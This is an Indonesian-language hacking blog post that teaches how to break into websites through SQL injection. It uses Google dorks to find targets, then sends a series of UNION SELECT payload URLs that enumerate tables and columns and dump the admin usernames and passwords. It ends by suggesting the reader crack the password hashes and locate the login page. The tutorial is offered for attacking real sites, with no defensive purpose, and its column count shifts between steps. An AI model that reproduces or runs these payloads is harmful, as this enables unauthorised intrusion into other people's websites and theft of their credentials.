Hack website dengan SQL injection

assalamualaikum wr.wb
      
              alhamdulilah akhirnya blog ini jadi juga walaupun jelek tapi tak apalah yang penting saya bisa berbagi pada teman-teman nih yang tertarik di dunia hacking seperti saya hahahahaha,(hacker newbie) oh tidak bahkan di bawahnya newbie alias under newbie heheheh,udahlah-udahlah kalo ngobroll ngoceh terus gax apa abisnya so saya beri judul di atas pasti dari temen temen udah pada gak sabar ingin langsung surfing mencari target yang udah di greget dari dulu eits gx semudah itu untuk itu kita pelajari skill ini cekidot

 sebenernya agan nih udah tau belom sih,apa itu SQL injection jangan sampai tau toturnya tapi gx tau artinya wah bisa di ketawain nanti,hahahahahahahaha........" ini saya dapet dari master saya loh namanya X Inject
               SQL injection adalah teknik yang digunakan dengan memasukan bagian dari pernyataan SQL dalam bidang entri dalam upaya untuk mendapatkan website untuk lulus perintah nakal baru dibentuk SQL ke database. 
              
               Tuh udah tau kan sekarang kita harus kenal apa itu dork,dork adalah suatu suatu kata dari bahasa inggris yang dapat di artikan sebagai pemalas,bodoh atau apa tapi dork di sini berbeda dimana kita dapat mendapatkan data sebuah informasi dengan akurat bahkan kita dapat mengintip pass and username dari suatu website wah hebat yah,nah dork ini berfungsi di search engine master apalagi kalo bukan Mang google semua tersedia di sana,google dork bisa di jadikan senjata hacking para hacker,.udahlah cape ngocehnya langsung terjun:
masukan ini di google="inurl:pages_details.php?pages_id="(tanpa tanda petik) anda bisa cari dork lainya di google yah ini hanya contoh ko.

1.jika sudah ketemu agan bisa pilih satu target di sini contoh www.targetagan.com/pages.php?id=1 masukan dangerous karakter seperti tanda (') petik satu  di akhir url atau di akhir angka 1 menjadi seperti ini www.targetagan.com/pages.php?id=1'
2.jika muncul pesan seperti error contoh "you have an error in your sql syntax" dan juga ada yang "mysql query rows()" atau sebagainya yang penting pesan menunjukan kesalahan yah :)
3.lalu hapus tanda (') kita masukan perintah "order by " diikuti angka berurutan agan bisa langsung cek secara parameter untuk mengetest ada brapakah jumlah kolom di web tersebut cari terust sampai ada pesan unknoen column contoh: www.targetagan.com/pages.php?id=1 order by 1-- no error      www.targetagan.com/pages.php?id=1 order by 2-- no error                                                         www.targetagan.com/pages.php?id=1 order by 3-- no error                                                            www.targetagan.com/pages.php?id=1 order by 4-- no error                                          www.targetagan.com/pages.php?id=1 order by 5--  error
                 wah kita menemukan unknown pada order by 5-- berarti web terebut hanya memiliki 4 kolom :    6.sekarang mencari angka ajaib,yah benar untuk mencari bugnya hehehe,dengan menggunakan                  union select di ikuti urutan kolom tadi contoh                                                                                                                     www.targetagan.com/pages.php?id=1 union select 1,2,3,4-- (hapus order by dan ikuti dengan angka kolom di atas adalah 4 jadi angkanya adalah 1,2,3,4-- (tanda <--> ini untuk manampilkan angkanya bisa di ganti dengan */ tapi kalau saya lebih memilih <--> hehehehe)
7.udah kluar hurufnya ternyata angka 3 berarti kita hapus angka tiga dengan "version()"tanpa tanda petik     untuk mengcek versi berapakah sql yang di gunakan jika versi 5 bersyukurlah tapi jika versi 4 tingglkn         saja karena versi 4 tidak mendukung printah information schema.
contoh: www.targetagan.com/pages.php?id=1 union select 1,2,version(),4--
8.masukan printah ini contoh www.targetagan.com/pages.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database--               udah muncul mas agan tabel nya adalh admin,member,image,dll nah kali ini kita butuh tool namanya hackbar yaitu sebuah add-on dari mozila firefox anda bisa download di add-ons mozila kali ini saya tidak menyediakan link apapun hanya tutorialnya saja.lanjut terjemahkan kata admin dengn bahasa komputer (char) kita masuk ke SQL-MySQL-MySQL Char() klik masukan kata admin dan muncul deh seperti ini char untuk admin "CHAR(97, 100, 109, 105, 110)" tanpa tanda petik yoh.
9.selanjutnya group_concat(table_name) ” dengan perintah “ column_name ” menjadi “  group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi  “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ” jadi seperti ini www.targetagan.com/pages.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)-- ganti database() dengn char tadi yah nah ketemu tuh id,username,pass,email nah trus gmna sok lanjut ke no 10
10.http://www.targetagan.com/pages.php?id=-1 union select 1,group_concat(id,0x3a,username,0x3a,pass,0x3a,email),3,4,5,6 from admin-- (ganti column_name dengn poin di yang agan temukan untuk penjaga garis sertakan perintah 0x3a)

nah selesai agan dapet name dab passwordnya yaitu admin:admin12345 ekh iyha jika agan menemukan password seperti 3a232b2mnb3b4nmbhfgnms4f itu namanya masih dlm bentuk hash agan bisa cari di google untuk mendecrypt passnya dan yang terakhir cari halaman loginya dengn menggunakan admin finder atau memanfaatkan fasilitas yang ada dalam tool havij



      sekian tutorial dari saya semogha bermanfaat,ingat tidak ada yang tidak bisa kita dapatkan dengn kerja keras yang kita butuhkan hanya tekat yang kuat maka semuanya akan terbongkar dengn mudah. :)
Tag : Hacking
0 Komentar untuk "Hack website dengan SQL injection"

Back To Top